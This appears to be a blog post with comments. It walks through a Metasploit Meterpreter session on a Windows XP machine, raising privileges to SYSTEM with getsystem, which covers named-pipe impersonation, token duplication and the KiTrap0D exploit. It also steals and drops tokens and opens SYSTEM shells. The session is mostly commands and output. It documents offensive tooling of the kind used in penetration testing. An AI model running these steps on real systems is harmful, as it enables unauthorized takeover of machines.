meterpreter > getuid
Server username: WINXPSP3\user **user is an admin, if not admin you can only use -t 4 or -t 0 which will iterate through all options**
meterpreter > use priv
Loading extension priv...success.
meterpreter > getsystem -h
Usage: getsystem [options]
Attempt to elevate your privilege to that of local system.
OPTIONS:
-h Help Banner.
-t
0 : All techniques available
1 : Service - Named Pipe Impersonation (In Memory/Admin)
2 : Service - Named Pipe Impersonation (Dropper/Admin)
3 : Service - Token Duplication (In Memory/Admin)
4 : Exploit - KiTrap0D (In Memory/User)
meterpreter > getsystem -t 1
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > rev2self
meterpreter > getuid
Server username: WINXPSP3\user
meterpreter > getsystem -t 2
...got system (via technique 2).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > rev2self
meterpreter > getuid
Server username: WINXPSP3\user
meterpreter > getsystem -t 3
...got system (via technique 3).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > rev2self
meterpreter > getuid
Server username: WINXPSP3\user
meterpreter > getsystem
...got system (via technique 4).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Hey I want user back!
meterpreter > getsystem -t 4
...got system (via technique 4).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > rev2self
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
steal_token
meterpreter > steal_token -h
[-] Usage: steal_token [pid]
meterpreter > ps
Process list
============
PID Name Arch User Path
--- ---- ---- ---- ----
0 [System Process]
4 System x86 NT AUTHORITY\SYSTEM
368 smss.exe x86 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
592 csrss.exe x86 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
616 winlogon.exe x86 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
660 services.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
672 lsass.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
832 svchost.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
908 svchost.exe x86 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
1000 svchost.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1048 svchost.exe x86 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
1088 svchost.exe x86 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\system32\svchost.exe
1440 spoolsv.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1560 explorer.exe x86 WINXPSP3\user C:\WINDOWS\Explorer.EXE
540 alg.exe x86 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\System32\alg.exe
980 wscntfy.exe x86 WINXPSP3\user C:\WINDOWS\system32\wscntfy.exe
1360 wuauclt.exe x86 WINXPSP3\user C:\WINDOWS\system32\wuauclt.exe
2004 svchost.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
2000 ctfmon.exe x86 WINXPSP3\user C:\WINDOWS\system32\ctfmon.exe
960 WINWORD.EXE x86 WINXPSP3\user C:\Program Files\Microsoft Office\Office12\WINWORD.EXE
664 WYvWeNeBQtYr.exe x86 NT AUTHORITY\SYSTEM C:\Documents and Settings\user\WYvWeNeBQtYr.exe
meterpreter > steal_token 1560
Stolen token with username: WINXPSP3\user
meterpreter > getuid
Server username: WINXPSP3\user
meterpreter > shell <--now uses -t by default Process 1272 created. Channel 2 created.
Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\user>whoami
whoami
WINXPSP3\user
C:\Documents and Settings\user>
wait I want a SYSTEM shell again
meterpreter > drop_token
Relinquished token, now running as: WINXPSP3\user
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 856 created.
Channel 3 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\user>whoami
whoami
NT AUTHORITY\SYSTEM
C:\Documents and Settings\user>
or call execute without -t to use your process token
meterpreter > execute -f cmd.exe -i -c -H
Process 676 created.
Channel 5 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\user>whoami
whoami
NT AUTHORITY\SYSTEM
C:\Documents and Settings\user>
How is it possible?
ReplyDeleteIs it public available?
svn up!
ReplyDelete